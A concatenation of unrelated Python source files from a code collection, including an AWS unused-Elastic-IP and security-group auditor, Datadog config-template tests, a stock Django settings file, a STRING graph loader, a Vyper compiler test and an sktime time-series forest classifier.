int(len(data) * train_split) print("using", N, "paths for training") if self.add_demos_to_replay_buffer: for path in data[:N]: self.load_path(path, self.replay_buffer, obs_dict=obs_dict) if is_demo: for path in data[:N]: self.load_path(path, self.demo_train_buffer, obs_dict=obs_dict) for path in data[N:]: self.load_path(path, self.demo_test_buffer, obs_dict=obs_dict) def get_batch_from_buffer(self, replay_buffer): batch = replay_buffer.random_batch(self.bc_batch_size) batch = np_to_pytorch_batch(batch) # obs = batch['observations'] # next_obs = batch['next_observations'] # goals = batch['resampled_goals'] # import ipdb; ipdb.set_trace() # batch['observations'] = torch.cat(( # obs, # goals # ), dim=1) # batch['next_observations'] = torch.cat(( # next_obs, # goals # ), dim=1) return batch
py
7dfd1c7e5eba6fdfc9d1b7c91958e601880f7265
#!/usr/bin/env python ''' Class that allows us to take all unused ip addresses for a region, and search through all security groups for its reference. Options: --region (optional, example: us-east-1, example: --all [searches all regions]) --ip_addresses (string): one or multiple ip addresses, comma separated, no spaces ''' import os import argparse import boto3 from eip_auditor.lib import base from emojipedia import Emojipedia class Client(object): """docstring for Client. @attributes: client: An instance of the ECR boto3 client. """ def __init__(self, region=None, cidr=None): """Initializer Args: region (str): the aws region to check for unused IP Addreses cidr (str|list): a list of ip addresses to search for in security groups Returns: String """ super(Client, self).__init__() self.regions = [] self.default_region = 'us-east-1' self.__set_region__(region) self.access_key = os.getenv('AWS_ACCESS_KEY_ID', None) self.secret_key = os.getenv('AWS_SECRET_ACCESS_KEY', None) self.session = None self.client = None self.cidr = cidr def perform(self): """Main method to be called to run this application. Args: N/A Returns: N/A """ print "Searching for usage in {}:\n".format(self.regions) for i in self.regions: self.session = boto3.Session(region_name=i) self.client = self.session.client('ec2') cidr_list = self.__set_cidr_list__(self.cidr, i) if len(cidr_list) < 1: print Emojipedia.search('smiling-face-with-smiling-eyes').character + " No unused IP addresses found " + Emojipedia.search('smiling-face-with-smiling-eyes').character else: for cidr in cidr_list: print "\t{}/32".format(cidr) print "\n" self.describe_security_groups(cidr_list) print "\n\n" def describe_unused_ip_addresses(self): """Find unused IP addresses from a dict and map the names to a list Args: N/A Returns: rtn (list): List of unused IP Addresses """ rtn = [] for k in self.client.describe_addresses()['Addresses']: if ('AssociationId' in k) or ('InstanceId' in k) or ('PrivateIpAddress' in k) or 'NetworkInterfaceId' in k: continue rtn.append(k['PublicIp']) return rtn def describe_security_groups(self, cidr_list): """Find unused IP addresses from a dict and map the names to a list Args: N/A Returns: rtn (list): List of unused IP Addresses """ filters = [] cidr_inbound_permission = { 'Name': 'ip-permission.cidr', 'Values': [] } for k in cidr_list: cidr_inbound_permission['Values'].append( [ "{}/32".format(k) ] ) cidr_inbound_permission['Values'] = base.flatten(cidr_inbound_permission['Values']) filters.append(cidr_inbound_permission) rtn = self.client.describe_security_groups( Filters=filters ) found_mapping = {} if len(rtn['SecurityGroups']) > 0: print Emojipedia.search('loudly-crying-face').character + " Found Unused IP Address(es) in the following SGs: " + Emojipedia.search('loudly-crying-face').character for k in rtn['SecurityGroups']: found_mapping[k['GroupId']] = [] for j in k['IpPermissions']: for l in j['IpRanges']: if l['CidrIp'] in cidr_inbound_permission['Values']: found_mapping[k['GroupId']].append(l['CidrIp']) for k in found_mapping: print k + ": " for j in found_mapping[k]: print "\t" + j print "\n" else: print Emojipedia.search('smiling-face-with-smiling-eyes').character + " Unused IP Addresses do not exist in any security group " + Emojipedia.search('smiling-face-with-smiling-eyes').character return found_mapping def __set_cidr_list__(self, cidr, region): """Determine which IP Addresses to look at, either determined by the user or by a region list Args: cidr (str/list): cidr list or string determined by the user region (str): the aws region to look in Returns: cidr_list (list): list of unused IP Addresses for a specific region """ cidr_list = [] if cidr is None: print "Found the following unused EIPs in {}".format(region) cidr_list = self.describe_unused_ip_addresses() elif isinstance(cidr, basestring): print "Setting CIDR list to argument value specified" split = self.cidr.split(",") cidr_list = split return cidr_list def __set_region__(self, region): """Determine which regions to look for unused IP Addresses in Args: region (str): the region passed by args Returns: N/A """ if region is None: raise "Region not set." elif region == "all": self.regions = [] for i in boto3.client('ec2', region_name=self.default_region).describe_regions()['Regions']: self.regions.append(i['RegionName']) else: self.regions = [region]
py
7dfd1d35f6e7644e05696f8b7ef85f8698aa1f62
# (C) Datadog, Inc. 2019-present # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) import re import pytest from datadog_checks.dev import TempDir from datadog_checks.dev.tooling.configuration.template import ConfigTemplates from datadog_checks.dev.utils import ensure_parent_dir_exists, path_join, write_file pytestmark = [pytest.mark.conf, pytest.mark.conf_template] class TestLoadBasic: def test_default(self): templates = ConfigTemplates() assert templates.load('init_config/tags') == { 'name': 'tags', 'value': { 'example': ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>'], 'type': 'array', 'items': {'type': 'string'}, }, 'description': ( 'A list of tags to attach to every metric and service check emitted by this integration.\n' '\n' 'Learn more about tagging at https://docs.datadoghq.com/tagging\n' ), } def test_custom_path_precedence(self): with TempDir() as d: template_file = path_join(d, 'init_config', 'tags.yaml') ensure_parent_dir_exists(template_file) write_file(template_file, 'test:\n- foo\n- bar') templates = ConfigTemplates([d]) assert templates.load('init_config/tags') == {'test': ['foo', 'bar']} def test_cache(self): with TempDir() as d: template_file = path_join(d, 'init_config', 'tags.yaml') ensure_parent_dir_exists(template_file) write_file(template_file, 'test:\n- foo\n- bar') templates = ConfigTemplates([d]) templates.load('init_config/tags') write_file(template_file, '> invalid') assert templates.load('init_config/tags') == {'test': ['foo', 'bar']} def test_unknown_template(self): templates = ConfigTemplates() with pytest.raises(ValueError, match='^Template `unknown` does not exist$'): templates.load('unknown') def test_parse_error(self): with TempDir() as d: template_file = path_join(d, 'invalid.yaml') ensure_parent_dir_exists(template_file) write_file(template_file, '> invalid') templates = ConfigTemplates([d]) with pytest.raises(ValueError, match='^Unable to parse template `{}`'.format(re.escape(template_file))): templates.load('invalid') class TestLoadBranches: def test_mapping(self): templates = ConfigTemplates() assert templates.load('init_config/tags.value.example') == ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>'] def test_mapping_not_found(self): templates = ConfigTemplates() with pytest.raises(ValueError, match='^Template `init_config/tags` has no element `value.foo`$'): templates.load('init_config/tags.value.foo') def test_list(self): templates = ConfigTemplates() assert templates.load('instances/http.skip_proxy.value') == {'example': False, 'type': 'boolean'} def test_list_not_found(self): templates = ConfigTemplates() with pytest.raises(ValueError, match='^Template `instances/http` has no named element `foo`$'): templates.load('instances/http.foo') def test_primitive(self): templates = ConfigTemplates() assert templates.load('instances/http.skip_proxy.value.example') is False def test_primitive_recurse(self): templates = ConfigTemplates() with pytest.raises( ValueError, match=( '^Template `instances/http.skip_proxy.value.example` does ' 'not refer to a mapping, rather it is type `bool`$' ), ): templates.load('instances/http.skip_proxy.value.example.foo') class TestApplyOverrides: def test_mapping(self): templates = ConfigTemplates() template = templates.load('init_config/tags') errors = templates.apply_overrides(template, {'value.example': ['foo', 'bar']}) assert not errors assert template == { 'name': 'tags', 'value': {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}}, 'description': ( 'A list of tags to attach to every metric and service check emitted by this integration.\n' '\n' 'Learn more about tagging at https://docs.datadoghq.com/tagging\n' ), } def test_mapping_with_branches(self): templates = ConfigTemplates() template = templates.load('init_config/tags.value') errors = templates.apply_overrides(template, {'example': ['foo', 'bar']}) assert not errors assert template == {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}} def test_mapping_with_name(self): templates = ConfigTemplates() template = templates.load('instances/tags') overrides = {'tags.required': True} templates.apply_overrides(template, overrides) assert not overrides assert template.get('required') is True def test_list(self): templates = ConfigTemplates() template = templates.load('instances/http') errors = templates.apply_overrides(template, {'skip_proxy.description': 'foobar'}) assert not errors assert { 'name': 'skip_proxy', 'value': {'example': False, 'type': 'boolean'}, 'description': 'foobar', } in template def test_list_with_branches(self): templates = ConfigTemplates() template = templates.load('instances/http.skip_proxy') errors = templates.apply_overrides(template, {'description': 'foobar'}) assert not errors assert template == { 'name': 'skip_proxy', 'value': {'example': False, 'type': 'boolean'}, 'description': 'foobar', } def test_list_replace(self): templates = ConfigTemplates() original_template = templates.load('instances/http') index = next(i for i, item in enumerate(original_template) if item.get('name') == 'skip_proxy') # no cov template = templates.load('instances/http') errors = templates.apply_overrides(template, {'skip_proxy': 'foobar'}) assert not errors assert 'foobar' in template assert template.index('foobar') == index template.remove('foobar') for item in template: assert item.get('name') != 'skip_proxy' def test_list_not_found(self): templates = ConfigTemplates() template = templates.load('instances/http') errors = templates.apply_overrides(template, {'proxy.value.properties.foo.foo': 'bar'}) assert len(errors) == 1 assert errors[0] == 'Template override `proxy.value.properties` has no named mapping `foo`' def test_list_not_found_root(self): templates = ConfigTemplates() template = templates.load('instances/http') errors = templates.apply_overrides(template, {'foo': 'bar'}) assert len(errors) == 1 assert errors[0] == 'Template override has no named mapping `foo`' def test_primitive(self): templates = ConfigTemplates() template = templates.load('instances/http') errors = templates.apply_overrides(template, {'proxy.description.foo': 'bar'}) assert len(errors) == 1 assert errors[0] == 'Template override `proxy.description` does not refer to a mapping' def test_primitive_recurse(self): templates = ConfigTemplates() template = templates.load('instances/http') errors = templates.apply_overrides(template, {'proxy.description.foo.foo': 'bar'}) assert len(errors) == 1 assert errors[0] == 'Template override `proxy.description` does not refer to a mapping'
py
7dfd1e6220e1d27d77d7f5069d12cae497896556
""" Django settings for proj project. Generated by 'django-admin startproject' using Django 3.2.5. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'django-insecure-v&na%llzfvn&^%_ezvru%$zs2%7wl7zfh26+demp!o)0q)x&4u' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'words' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'proj.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'proj.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
py
7dfd1e73b9443579ca81ffdc8faa1b23b60696dc
""" This file offers the methods to automatically retrieve the graph Marinimicrobium sp. LS-A18. The graph is automatically retrieved from the STRING repository. References --------------------- Please cite the following if you use the data: ```bib @article{szklarczyk2019string, title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets}, author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others}, journal={Nucleic acids research}, volume={47}, number={D1}, pages={D607--D613}, year={2019}, publisher={Oxford University Press} } ``` """ from typing import Dict from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph from ...ensmallen import Graph # pylint: disable=import-error def MarinimicrobiumSpLsA18( directed: bool = False, preprocess: bool = True, load_nodes: bool = True, verbose: int = 2, cache: bool = True, cache_path: str = "graphs/string", version: str = "links.v11.5", **additional_graph_kwargs: Dict ) -> Graph: """Return new instance of the Marinimicrobium sp. LS-A18 graph. The graph is automatically retrieved from the STRING repository. Parameters ------------------- directed: bool = False Wether to load the graph as directed or undirected. By default false. preprocess: bool = True Whether to preprocess the graph to be loaded in optimal time and memory. load_nodes: bool = True, Whether to load the nodes vocabulary or treat the nodes simply as a numeric range. verbose: int = 2, Wether to show loading bars during the retrieval and building of the graph. cache: bool = True Whether to use cache, i.e. download files only once and preprocess them only once. cache_path: str = "graphs" Where to store the downloaded graphs. version: str = "links.v11.5" The version of the graph to retrieve. The available versions are: - homology.v11.5 - physical.links.v11.5 - links.v11.5 additional_graph_kwargs: Dict Additional graph kwargs. Returns ----------------------- Instace of Marinimicrobium sp. LS-A18 graph. References --------------------- Please cite the following if you use the data: ```bib @article{szklarczyk2019string, title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets}, author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others}, journal={Nucleic acids research}, volume={47}, number={D1}, pages={D607--D613}, year={2019}, publisher={Oxford University Press} } ``` """ return AutomaticallyRetrievedGraph( graph_name="MarinimicrobiumSpLsA18", repository="string", version=version, directed=directed, preprocess=preprocess, load_nodes=load_nodes, verbose=verbose, cache=cache, cache_path=cache_path, additional_graph_kwargs=additional_graph_kwargs )()
py
7dfd1f88b72e614bc131c0bba9884fe0a6303ce3
#!/usr/bin/env python3 import vyper from vyper.cli.vyper_json import format_to_output_dict from vyper.compiler import OUTPUT_FORMATS, compile_codes FOO_CODE = """ @public def foo() -> bool: return True """ def test_keys(): compiler_data = compile_codes({"foo.vy": FOO_CODE}, output_formats=list(OUTPUT_FORMATS.keys())) output_json = format_to_output_dict(compiler_data) assert sorted(output_json.keys()) == ["compiler", "contracts", "sources"] assert output_json["compiler"] == f"vyper-{vyper.__version__}" data = compiler_data["foo.vy"] assert output_json["sources"]["foo.vy"] == {"id": 0, "ast": data["ast_dict"]["ast"]} assert output_json["contracts"]["foo.vy"]["foo"] == { "abi": data["abi"], "devdoc": data["devdoc"], "interface": data["interface"], "ir": data["ir"], "userdoc": data["userdoc"], "evm": { "bytecode": {"object": data["bytecode"], "opcodes": data["opcodes"]}, "deployedBytecode": { "object": data["bytecode_runtime"], "opcodes": data["opcodes_runtime"], "sourceMap": data["source_map"]["pc_pos_map_compressed"], }, "methodIdentifiers": data["method_identifiers"], }, }
py
7dfd1fe72bbcbb220381e5c91c69150ec4af0e44
from warnings import warn from warnings import catch_warnings from warnings import simplefilter import numpy as np import pandas as pd from scipy.sparse import issparse from sklearn.ensemble.forest import ForestClassifier from sklearn.ensemble.forest import MAX_INT from sklearn.ensemble.forest import _generate_sample_indices from sklearn.ensemble.forest import _generate_unsampled_indices from sklearn.ensemble.base import _partition_estimators from sklearn.utils._joblib import Parallel, delayed from sklearn.tree._tree import DOUBLE from sklearn.utils import check_random_state from sklearn.utils import check_array from sklearn.utils import compute_sample_weight from sklearn.utils.validation import check_is_fitted from sklearn.exceptions import DataConversionWarning from sklearn.tree import DecisionTreeClassifier from ..pipeline import Pipeline from ..transformers.series_to_tabular import RandomIntervalFeatureExtractor from ..utils.time_series import time_series_slope __all__ = ["TimeSeriesForestClassifier"] class TimeSeriesForestClassifier(ForestClassifier): """Time-Series Forest Classifier. A time series forest is a meta estimator and an adaptation of the random forest for time-series/panel data that fits a number of decision tree classifiers on various sub-samples of a transformed dataset and uses averaging to improve the predictive accuracy and control over-fitting. The sub-sample size is always the same as the original input sample size but the samples are drawn with replacement if `bootstrap=True` (default). Parameters ---------- base_estimator : Pipeline A pipeline consisting of series-to-tabular transformers and a decision tree classifier as final estimator. n_estimators : integer, optional (default=100) The number of trees in the forest. criterion : string, optional (default="gini") The function to measure the quality of a split. Supported criteria are "gini" for the Gini impurity and "entropy" for the information gain. Note: this parameter is tree-specific. max_depth : integer or None, optional (default=None) The maximum depth of the tree. If None, then nodes are expanded until all leaves are pure or until all leaves contain less than min_samples_split samples. min_samples_split : int, float, optional (default=2) The minimum number of samples required to split an internal node: - If int, then consider `min_samples_split` as the minimum number. - If float, then `min_samples_split` is a fraction and `ceil(min_samples_split * n_samples)` are the minimum number of samples for each split. min_samples_leaf : int, float, optional (default=1) The minimum number of samples required to be at a leaf node. A split point at any depth will only be considered if it leaves at least ``min_samples_leaf`` training samples in each of the left and right branches. This may have the effect of smoothing the model, especially in regression. - If int, then consider `min_samples_leaf` as the minimum number. - If float, then `min_samples_leaf` is a fraction and `ceil(min_samples_leaf * n_samples)` are the minimum number of samples for each node. min_weight_fraction_leaf : float, optional (default=0.) The minimum weighted fraction of the sum total of weights (of all the input samples) required to be at a leaf node. Samples have equal weight when sample_weight is not provided. max_features : int, float, string or None, optional (default="auto") The number of features to consider when looking for the best split: - If int, then consider `max_features` features at each split. - If float, then `max_features` is a fraction and `int(max_features * n_features)` features are considered at each split. - If "auto", then `max_features=sqrt(n_features)`. - If "sqrt", then `max_features=sqrt(n_features)` (same as "auto"). - If "log2", then `max_features=log2(n_features)`. - If None, then `max_features=n_features`. Note: the search for a split does not stop until at least one valid partition of the node samples is found, even if it requires to effectively inspect more than ``max_features`` features. max_leaf_nodes : int or None, optional (default=None) Grow trees with ``max_leaf_nodes`` in best-first fashion. Best nodes are defined as relative reduction in impurity. If None then unlimited number of leaf nodes. min_impurity_decrease : float, optional (default=0.) A node will be split if this split induces a decrease of the impurity greater than or equal to this value. The weighted impurity decrease equation is the following:: N_t / N * (impurity - N_t_R / N_t * right_impurity - N_t_L / N_t * left_impurity) where ``N`` is the total number of samples, ``N_t`` is the number of samples at the current node, ``N_t_L`` is the number of samples in the left child, and ``N_t_R`` is the number of samples in the right child. ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum, if ``sample_weight`` is passed. min_impurity_split : float, (default=1e-7) Threshold for early stopping in tree growth. A node will split if its impurity is above the threshold, otherwise it is a leaf. bootstrap : boolean, optional (default=True) Whether bootstrap samples are used when building trees. oob_score : bool (default=False) Whether to use out-of-bag samples to estimate the generalization accuracy. n_jobs : int or None, optional (default=None) The number of jobs to run in parallel for both `fit` and `predict`. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. random_state : int, RandomState instance or None, optional (default=None) If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. verbose : int, optional (default=0) Controls the verbosity when fitting and predicting. warm_start : bool, optional (default=False) When set to ``True``, reuse the solution of the previous call to fit and add more estimators to the ensemble, otherwise, just fit a whole new forest. See :term:`the Glossary <warm_start>`. class_weight : dict, list of dicts, "balanced", "balanced_subsample" or \ None, optional (default=None) Weights associated with classes in the form ``{class_label: weight}``. If not given, all classes are supposed to have weight one. For multi-output problems, a list of dicts can be provided in the same order as the columns of y. Note that for multioutput (including multilabel) weights should be defined for each class of every column in its own dict. For example, for four-class multilabel classification weights should be [{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of [{1:1}, {2:5}, {3:1}, {4:1}]. The "balanced" mode uses the values of y to automatically adjust weights inversely proportional to class frequencies in the input data as ``n_samples / (n_classes * np.bincount(y))`` The "balanced_subsample" mode is the same as "balanced" except that weights are computed based on the bootstrap sample for every tree grown. For multi-output, the weights of each column of y will be multiplied. Note that these weights will be multiplied with sample_weight (passed through the fit method) if sample_weight is specified. Attributes ---------- estimators_ : list of DecisionTreeClassifier The collection of fitted sub-estimators. classes_ : array of shape = [n_classes] or a list of such arrays The classes labels (single output problem), or a list of arrays of class labels (multi-output problem). n_classes_ : int or list The number of classes (single output problem), or a list containing the number of classes for each output (multi-output problem). n_features_ : int The number of features when ``fit`` is performed. n_outputs_ : int The number of outputs when ``fit`` is performed. feature_importances_ : array of shape = [n_features] The feature importances (the higher, the more important the feature). oob_score_ : float Score of the training dataset obtained using an out-of-bag estimate. oob_decision_function_ : array of shape = [n_samples, n_classes] Decision function computed with out-of-bag estimate on the training set. If n_estimators is small it might be possible that a data point was never left out during the bootstrap. In this case, `oob_decision_function_` might contain NaN. """ def __init__(self, base_estimator=None, n_estimators=500, criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, min_weight_fraction_leaf=0., max_features=None, max_leaf_nodes=None, min_impurity_decrease=0., min_impurity_split=None, bootstrap=False, oob_score=False, n_jobs=None, random_state=None, verbose=0, warm_start=False, class_weight=None, check_input=True): if base_estimator is None: features = [np.mean, np.std, time_series_slope] steps = [('transform', RandomIntervalFeatureExtractor(n_intervals='sqrt', features=features)), ('clf', DecisionTreeClassifier())] base_estimator = Pipeline(steps) elif not isinstance(base_estimator, Pipeline): raise ValueError('Base estimator must be pipeline with transforms.') elif not isinstance(base_estimator.steps[-1][1], DecisionTreeClassifier): raise ValueError('Last step in base estimator pipeline must be DecisionTreeClassifier.') # Rename estimator params according to name in pipeline. estimator = base_estimator.steps[-1][0] estimator_params = { "criterion": criterion, "max_depth": max_depth, "min_samples_split": min_samples_split, "min_samples_leaf": min_samples_leaf, "min_weight_fraction_leaf": min_weight_fraction_leaf, "max_features": max_features, "max_leaf_nodes": max_leaf_nodes, "min_impurity_decrease": min_impurity_decrease, "min_impurity_split": min_impurity_split, } estimator_params = {f'{estimator}__{pname}': pval for pname, pval in estimator_params.items()} # Pass on params. super(TimeSeriesForestClassifier, self).__init__( base_estimator=base_estimator, n_estimators=n_estimators, estimator_params=tuple(estimator_params.keys()), bootstrap=bootstrap, oob_score=oob_score, n_jobs=n_jobs, random_state=random_state, verbose=verbose, warm_start=warm_start, class_weight=class_weight ) # Assign random state to pipeline. base_estimator.set_params(**{'random_state': random_state, 'check_input': False}) # Store renamed estimator params. for pname, pval in estimator_params.items(): self.__setattr__(pname, pval) self.check_input = check_input def fit(self, X, y, sample_weight=None): """Build a forest of trees from the training set (X, y). Parameters ---------- X : array-like or sparse matrix of shape = [n_samples, n_features] The training input samples. Internally, its dtype will be converted to ``dtype=np.float32``. If a sparse matrix is provided, it will be converted into a sparse ``csc_matrix``. y : array-like, shape = [n_samples] or [n_samples, n_outputs] The target values (class labels in classification, real numbers in regression). sample_weight : array-like, shape = [n_samples] or None Sample weights. If None, then samples are equally weighted. Splits that would create child nodes with net zero or negative weight are ignored while searching for a split in each node. In the case of classification, splits are also ignored if they would result in any single class carrying a negative weight in either child node. Returns ------- self : object """ # Validate or convert input data if sample_weight is not None: sample_weight = check_array(sample_weight, ensure_2d=False) if issparse(X): # Pre-sort indices to avoid that each individual tree of the # ensemble sorts the indices. X.sort_indices() # Remap output self.n_features_ = X.shape[1] if X.ndim == 2 else 1 y = np.atleast_1d(y) if y.ndim == 2 and y.shape[1] == 1: warn("A column-vector y was passed when a 1d array was" " expected. Please change the shape of y to " "(n_samples,), for example using ravel().", DataConversionWarning, stacklevel=2) if y.ndim == 1: # reshape is necessary to preserve the data contiguity against vs # [:, np.newaxis] that does not. y = np.reshape(y, (-1, 1)) self.n_outputs_ = y.shape[1] y, expanded_class_weight = self._validate_y_class_weight(y) if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous: y = np.ascontiguousarray(y, dtype=DOUBLE) if expanded_class_weight is not None: if sample_weight is not None: sample_weight = sample_weight * expanded_class_weight else: sample_weight = expanded_class_weight # Check parameters self._validate_estimator() if not self.bootstrap and self.oob_score: raise ValueError("Out of bag estimation only available" " if bootstrap=True") random_state = check_random_state(self.random_state) if not self.warm_start or not hasattr(self, "estimators_"): # Free allocated memory, if any self.estimators_ = [] n_more_estimators = self.n_estimators - len(self.estimators_) if n_more_estimators < 0: raise ValueError('n_estimators=%d must be larger or equal to ' 'len(estimators_)=%d when warm_start==True' % (self.n_estimators, len(self.estimators_))) elif n_more_estimators == 0: warn("Warm-start fitting without increasing n_estimators does not " "fit new trees.") else: if self.warm_start and len(self.estimators_) > 0: # We draw from the random state to get the random state we # would have got if we hadn't used a warm_start. random_state.randint(MAX_INT, size=len(self.estimators_)) trees = [self._make_estimator(append=False, random_state=random_state) for i in range(n_more_estimators)] # Parallel loop: for standard random forests, the threading # backend is preferred as the Cython code for fitting the trees # is internally releasing the Python GIL making threading more # efficient than multiprocessing in that case. However, in this case, # for fitting pipelines in parallel, multiprocessing is more efficient. trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)( delayed(_parallel_build_trees)( t, self, X, y, sample_weight, i, len(trees), verbose=self.verbose, class_weight=self.class_weight) for i, t in enumerate(trees)) # Collect newly grown trees self.estimators_.extend(trees) if self.oob_score: self._set_oob_score(X, y) # Decapsulate classes_ attributes if hasattr(self, "classes_") and self.n_outputs_ == 1: self.n_classes_ = self.n_classes_[0] self.classes_ = self.classes_[0] return self def predict_proba(self, X): """Predict class probabilities for X. The predicted class probabilities of an input sample are computed as the mean predicted class probabilities of the trees in the forest. The class probability of a single tree is the fraction of samples of the same class in a leaf. Parameters ---------- X : array-like or sparse matrix of shape = [n_samples, n_features] The input samples. Internally, its dtype will be converted to ``dtype=np.float32``. If a sparse matrix is provided, it will be converted into a sparse ``csr_matrix``. Returns ------- p : array of shape = [n_samples, n_classes], or a list of n_outputs such arrays if n_outputs > 1. The class probabilities of the input samples. The order of the classes corresponds to that in the attribute `classes_`. """ check_is_fitted(self, 'estimators_') # Check data if self.check_input: X = self._validate_X_predict(X) # Assign chunk of trees to jobs n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs) all_proba = Parallel(n_jobs=n_jobs, verbose=self.verbose)(delayed(e.predict_proba)(X) for e in self.estimators_) all_proba = np.sum(all_proba, axis=0) / len(self.estimators_) if len(all_proba) == 1: return all_proba[0] else: return all_proba def _validate_X_predict(self, X): n_features = X.shape[1] if X.ndim == 2 else 1 if self.n_features_ != n_features: raise ValueError("Number of features of the model must " "match the input. Model n_features is %s and " "input n_features is %s " % (self.n_features_, n_features)) return X def apply(self, X): raise NotImplementedError() def decision_path(self, X): raise NotImplementedError() @property def feature_importances_(self): raise NotImplementedError def _set_oob_score(self, X, y): """Compute out-of-bag score""" if X.ndim == 1: X = pd.DataFrame(X) n_classes_ = self.n_classes_ n_samples = y.shape[0] oob_decision_function = [] oob_score = 0.0 predictions = [np.zeros((n_samples, n_classes_[k])) for k in range(self.n_outputs_)] for estimator in self.estimators_: unsampled_indices = _generate_unsampled_indices( estimator.random_state, n_samples) p_estimator = estimator.predict_proba(X.iloc[unsampled_indices, :]) if self.n_outputs_ == 1: p_estimator = [p_estimator] for k in range(self.n_outputs_): predictions[k][unsampled_indices, :] += p_estimator[k] for k in range(self.n_outputs_): if (predictions[k].sum(axis=1) == 0).any(): warn("Some inputs do not have OOB scores. " "This probably means too few trees were used " "to compute any reliable oob estimates.") decision = (predictions[k] / predictions[k].sum(axis=1)[:, np.newaxis]) oob_decision_function.append(decision) oob_score += np.mean(y[:, k] == np.argmax(predictions[k], axis=1), axis=0) if self.n_outputs_ == 1: self.oob_decision_function_ = oob_decision_function[0] else: self.oob_decision_function_ = oob_decision_function self.oob_score_ = oob_score / self.n_outputs_ def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees, verbose=0, class_weight=None): """Private function used to fit a single tree in parallel, adjusted for pipeline trees.""" if verbose > 1: print("building tree %d of %d" % (tree_idx + 1, n_trees)) # name of step of final estimator in pipeline estimator = tree.steps[-1][0] if forest.bootstrap: n_samples = X.shape[0] if sample_weight is None: curr_sample_weight = np.ones((n_samples,), dtype=np.float64) else: curr_sample_weight = sample_weight.copy() indices = _generate_sample_indices(tree.random_state, n_samples) sample_counts = np.bincount(indices, minlength=n_samples) curr_sample_weight *= sample_counts if class_weight == 'subsample': with catch_warnings(): simplefilter('ignore', DeprecationWarning) curr_sample_weight *= compute_sample_weight('auto', y, indices) elif class_weight == 'balanced_subsample': curr_sample_weight *= compute_sample_weight('balanced', y, indices) fit_params = {f'{estimator}__sample_weight': curr_sample_weight, f'{estimator}__check_input': True} tree.fit(X, y, **fit_params) else: fit_params = {f'{estimator}__sample_weight': sample_weight, f'{estimator}__check_input': True} tree.fit(X, y, **fit_params) return tree
py
7dfd1ff6e389c8f5add8b822981770d6bac63a81
